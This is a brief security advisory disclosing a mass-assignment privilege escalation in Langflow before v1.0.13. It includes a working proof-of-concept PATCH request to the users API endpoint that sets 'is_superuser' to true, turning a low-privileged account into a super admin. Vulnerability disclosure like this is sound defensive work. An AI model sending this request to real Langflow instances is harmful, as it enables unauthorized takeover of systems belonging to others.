Langflow Privilege Escalation through Mass Assignment
Langflow versions before v1.0.13 suffer from a Privilege Escalation vulnerability through Mass Assignment. By crafting a specific HTTP request to the users API endpoint, a remote and authenticated attacker with low privileges can obtain super admin privileges on the target Langflow instance.
Proof Of Concept:
In order to reproduce the issue, an attacker authenticated with low privileges on the application can send the following HTTP request:
PATCH /api/v1/users/[USER_ID] HTTP/1.1
Host: localhost
Authorization: Bearer [TOKEN]
Content-Length: 21
{
"is_superuser":true
}
The user can then verify that his privileges has been updated by accessing https://localhost/api/v1/users/whoami.
Rémy Marot
Tue, 07/30/2024 – 11:13